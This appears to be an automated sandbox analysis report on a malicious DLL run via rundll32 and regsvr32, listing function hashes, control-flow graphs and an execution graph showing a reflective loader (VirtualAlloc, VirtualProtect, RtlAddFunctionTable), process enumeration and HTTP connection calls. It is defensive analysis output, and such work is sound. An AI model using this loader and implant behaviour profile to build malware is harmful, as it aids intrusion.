                                                                      • API ID:
                                                                      • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                      • API String ID: 0-2100131636
                                                                      • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                      • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                      • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                      • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180013780 Relevance: 7.8, Strings: 6, Instructions: 323COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                      • API String ID: 0-2401169580
                                                                      • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                      • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                      • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                      • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000FC48 Relevance: 6.7, Strings: 5, Instructions: 447COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )#?$EX.$PT$UbA$2f
                                                                      • API String ID: 0-1318892062
                                                                      • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                      • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                      • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                      • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001FC0C Relevance: 6.6, Strings: 5, Instructions: 400COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 687 18001fc62-18001fc67 683->687 688 18001fde5-18001fe8f call 180012598 683->688 702 1800201fe-180020203 684->702 689 1800200b6-180020164 call 180012598 685->689 690 18001ff29-18001ff2e 685->690 695 18002020a-18002026b call 1800190d4 687->695 696 18001fc6d-18001fc72 687->696 688->679 689->679 698 1800200a1-1800200b1 call 1800014f8 690->698 699 18001ff34-18001ff39 690->699 711 180020270-180020291 695->711 706 18001fc78-18001fc7d 696->706 707 18001fd57-18001fde0 call 180012598 696->707 698->679 700 180020003-180020091 call 180021434 699->700 701 18001ff3f-18001ff44 699->701 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 720 18001fc8e-18001fd1a call 18001e938 715->720 716->679 720->679 723->679
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $T$?F$QP|m$qjf$tZp
                                                                      • API String ID: 0-3477398917
                                                                      • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                      • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                      • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                      • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180016D3C Relevance: 6.6, Strings: 5, Instructions: 379COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: JQ$k&($t$v$x\J
                                                                      • API String ID: 0-1134872184
                                                                      • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                      • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                      • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                      • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000703C Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: R$)H8$?rIc$L==$V
                                                                      • API String ID: 0-2512384441
                                                                      • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                      • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                      • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                      • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800119A8 Relevance: 6.3, Strings: 5, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Qq$bt$vird$+$S
                                                                      • API String ID: 0-3373980505
                                                                      • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                      • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                      • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                      • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180011AD0 Relevance: 5.3, Strings: 4, Instructions: 335COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: V$@$P9$^_"
                                                                      • API String ID: 0-1880944046
                                                                      • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                      • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                      • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                      • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: =_$F)k$b/$syG
                                                                      • API String ID: 0-3955183656
                                                                      • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                      • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                      • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                      • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180002D70 Relevance: 5.3, Strings: 4, Instructions: 266COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X$'Xsa$iJ6$vG
                                                                      • API String ID: 0-746338152
                                                                      • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                      • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                      • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                      • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800097C0 Relevance: 5.3, Strings: 4, Instructions: 257COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *i^$MIC$-Z$]2
                                                                      • API String ID: 0-498664264
                                                                      • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                      • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                      • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                      • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180010758 Relevance: 5.2, Strings: 4, Instructions: 222COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B$EG$QsF$_
                                                                      • API String ID: 0-784369960
                                                                      • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                      • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                      • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                      • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180020334 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -`G$.$5B.Y$Z`35
                                                                      • API String ID: 0-1363032466
                                                                      • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                      • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                      • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                      • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000EE98 Relevance: 5.2, Strings: 4, Instructions: 167COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *+_$WSh$\O$#o
                                                                      • API String ID: 0-1846314129
                                                                      • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                      • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                      • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                      • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180024D80 Relevance: 5.2, Strings: 4, Instructions: 155COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .B$O$M*K$\<
                                                                      • API String ID: 0-3225238681
                                                                      • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                      • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                      • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                      • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018002A42C Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$$$xVO$~O
                                                                      • API String ID: 0-3655128719
                                                                      • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                      • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                      • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                      • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800024B8 Relevance: 5.1, Strings: 4, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,IW$G$JMg$l
                                                                      • API String ID: 0-1370644289
                                                                      • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                      • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                      • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                      • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180018AB4 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,$,$2S=$i`}G
                                                                      • API String ID: 0-4285990414
                                                                      • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                      • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                      • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                      • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:18.9%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:5%
                                                                      Total number of Nodes:80
                                                                      Total number of Limit Nodes:9
                                                                      execution_graph 3902 18001aca4 3907 18001ad22 3902->3907 3903 18001ba75 3907->3903 3908 180012b50 3907->3908 3911 18000a4fc 3907->3911 3914 18001cec4 3907->3914 3910 180012b8a 3908->3910 3909 180012bfb InternetOpenW 3909->3907 3910->3909 3913 18000a572 3911->3913 3912 18000a5f0 HttpOpenRequestW 3912->3907 3913->3912 3916 18001cf4a 3914->3916 3915 18001cfe2 InternetConnectW 3915->3907 3916->3915 3917 f20000 3918 f20183 3917->3918 3919 f2043e VirtualAlloc 3918->3919 3923 f20462 3919->3923 3920 f20a7b 3921 f20531 GetNativeSystemInfo 3921->3920 3922 f2056d VirtualAlloc 3921->3922 3927 f2058b 3922->3927 3923->3920 3923->3921 3924 f20a00 3924->3920 3925 f20a56 RtlAddFunctionTable 3924->3925 3925->3920 3926 f209d9 VirtualProtect 3926->3927 3927->3924 3927->3926 3928 180015388 3931 1800227d4 3928->3931 3930 1800153e3 3935 18002281d 3931->3935 3933 180024315 3933->3930 3935->3933 3937 18001c05c 3935->3937 3941 18001c568 3935->3941 3948 180017908 3935->3948 3939 18001c0af 3937->3939 3940 18001c2e1 3939->3940 3952 18002ad58 3939->3952 3940->3935 3944 18001c58a 3941->3944 3943 18001c948 3943->3935 3944->3943 3959 180003598 3944->3959 3963 18000ac48 3944->3963 3967 180025dac 3944->3967 3971 1800097c0 3944->3971 3950 180017932 3948->3950 3949 180015e2c CreateThread 3949->3950 3950->3949 3951 180017bcd 3950->3951 3951->3935 3955 1800046a8 3952->3955 3954 18002ae38 3954->3939 3957 1800046ec 3955->3957 3956 180004982 3956->3954 3957->3956 3958 180004945 Process32FirstW 3957->3958 3958->3957 3961 180003640 3959->3961 3960 1800044c0 3960->3944 3961->3960 3975 18001ed50 3961->3975 3965 18000ac8e 3963->3965 3964 18000b5fe 3964->3944 3965->3964 3966 18001ed50 CreateFileW 3965->3966 3966->3965 3970 180025dde 3967->3970 3969 180026180 3969->3944 3970->3969 3982 180015e2c 3970->3982 3972 1800097fc 3971->3972 3973 18000981d 3972->3973 3974 18001ed50 CreateFileW 3972->3974 3973->3944 3974->3972 3977 18001ed7a 3975->3977 3978 18001f06b 3977->3978 3979 18000fb00 3977->3979 3978->3961 3981 18000fb80 3979->3981 3980 18000fc15 CreateFileW 3980->3977 3981->3980 3983 180015ea5 3982->3983 3984 180015f3b CreateThread 3983->3984 3984->3970 3985 180015e2c 3986 180015ea5 3985->3986 3987 180015f3b CreateThread 3986->3987 3988 18001496c 3989 1800149ce 3988->3989 3990 18000fb00 CreateFileW 3989->3990 3991 1800152ba 3989->3991 3990->3989 3992 180024d80 3994 180024eed 3992->3994 3993 1800250bd 3994->3993 3996 180019a30 3994->3996 3997 180019aa4 3996->3997 3998 180019b2a GetVolumeInformationW 3997->3998 3998->3993

                                                                      Executed Functions

                                                                      Function 00F20000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 f20000-f20460 call f20aa8 * 2 VirtualAlloc 22 f20462-f20466 0->22 23 f2048a-f20494 0->23 24 f20468-f20488 22->24 26 f20a91-f20aa6 23->26 27 f2049a-f2049e 23->27 24->23 24->24 27->26 28 f204a4-f204a8 27->28 28->26 29 f204ae-f204b2 28->29 29->26 30 f204b8-f204bf 29->30 30->26 31 f204c5-f204d2 30->31 31->26 32 f204d8-f204e1 31->32 32->26 33 f204e7-f204f4 32->33 33->26 34 f204fa-f20507 33->34 35 f20531-f20567 GetNativeSystemInfo 34->35 36 f20509-f20511 34->36 35->26 37 f2056d-f20589 VirtualAlloc 35->37 38 f20513-f20518 36->38 39 f205a0-f205ac 37->39 40 f2058b-f2059e 37->40 41 f20521 38->41 42 f2051a-f2051f 38->42 44 f205af-f205b2 39->44 40->39 43 f20523-f2052f 41->43 42->43 43->35 43->38 46 f205c1-f205db 44->46 47 f205b4-f205bf 44->47 48 f2061b-f20622 46->48 49 f205dd-f205e2 46->49 47->44 50 f206db-f206e2 48->50 51 f20628-f2062f 48->51 52 f205e4-f205ea 49->52 54 f20864-f2086b 50->54 55 f206e8-f206f9 50->55 51->50 53 f20635-f20642 51->53 56 f2060b-f20619 52->56 57 f205ec-f20609 52->57 53->50 60 f20648-f2064f 53->60 58 f20871-f2087f 54->58 59 f20917-f20929 54->59 61 f20702-f20705 55->61 56->48 56->52 57->56 57->57 64 f2090e-f20911 58->64 62 f20a07-f20a1a 59->62 63 f2092f-f20937 59->63 65 f20654-f20658 60->65 66 f20707-f2070a 61->66 67 f206fb-f206ff 61->67 88 f20a40-f20a4a 62->88 89 f20a1c-f20a27 62->89 68 f2093b-f2093f 63->68 64->59 72 f20884-f208a9 64->72 69 f206c0-f206ca 65->69 70 f20788-f2078e 66->70 71 f2070c-f2071d 66->71 67->61 73 f20945-f2095a 68->73 74 f209ec-f209fa 68->74 78 f2065a-f20669 69->78 79 f206cc-f206d2 69->79 75 f20794-f207a2 70->75 71->75 76 f2071f-f20720 71->76 94 f20907-f2090c 72->94 95 f208ab-f208b1 72->95 81 f2097b-f2097d 73->81 82 f2095c-f2095e 73->82 74->68 84 f20a00-f20a01 74->84 90 f207a8 75->90 91 f2085d-f2085e 75->91 87 f20722-f20784 76->87 85 f2067a-f2067e 78->85 86 f2066b-f20678 78->86 79->65 80 f206d4-f206d5 79->80 80->50 97 f209a2-f209a4 81->97 98 f2097f-f20981 81->98 92 f20960-f2096c 82->92 93 f2096e-f20979 82->93 84->62 99 f20680-f2068a 85->99 100 f2068c-f20690 85->100 96 f206bd-f206be 86->96 87->87 101 f20786 87->101 104 f20a7b-f20a8e 88->104 105 f20a4c-f20a54 88->105 102 f20a38-f20a3e 89->102 103 f207ae-f207d4 90->103 91->54 110 f209be-f209bf 92->110 93->110 94->64 106 f208b3-f208b9 95->106 107 f208bb-f208c8 95->107 96->69 116 f209a6-f209aa 97->116 117 f209ac-f209bb 97->117 111 f20983-f20987 98->111 112 f20989-f2098b 98->112 113 f206b6-f206ba 99->113 114 f20692-f206a3 100->114 115 f206a5-f206a9 100->115 101->75 102->88 108 f20a29-f20a35 102->108 129 f207d6-f207d9 103->129 130 f20835-f20839 103->130 104->26 105->104 109 f20a56-f20a79 RtlAddFunctionTable 105->109 119 f208ea-f208fe 106->119 120 f208d3-f208e5 107->120 121 f208ca-f208d1 107->121 108->102 109->104 118 f209c5-f209cb 110->118 111->110 112->97 124 f2098d-f2098f 112->124 113->96 114->113 115->96 125 f206ab-f206b3 115->125 116->110 117->110 126 f209d9-f209e9 VirtualProtect 118->126 127 f209cd-f209d3 118->127 119->94 138 f20900-f20905 119->138 120->119 121->120 121->121 131 f20991-f20997 124->131 132 f20999-f209a0 124->132 125->113 126->74 127->126 134 f207e3-f207f0 129->134 135 f207db-f207e1 129->135 136 f20844-f20850 130->136 137 f2083b 130->137 131->110 132->118 140 f207f2-f207f9 134->140 141 f207fb-f2080d 134->141 139 f20812-f2082c 135->139 136->103 142 f20856-f20857 136->142 137->136 138->95 139->130 144 f2082e-f20833 139->144 140->140 140->141 141->139 142->91 144->129
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.828890628.0000000000F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_f20000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
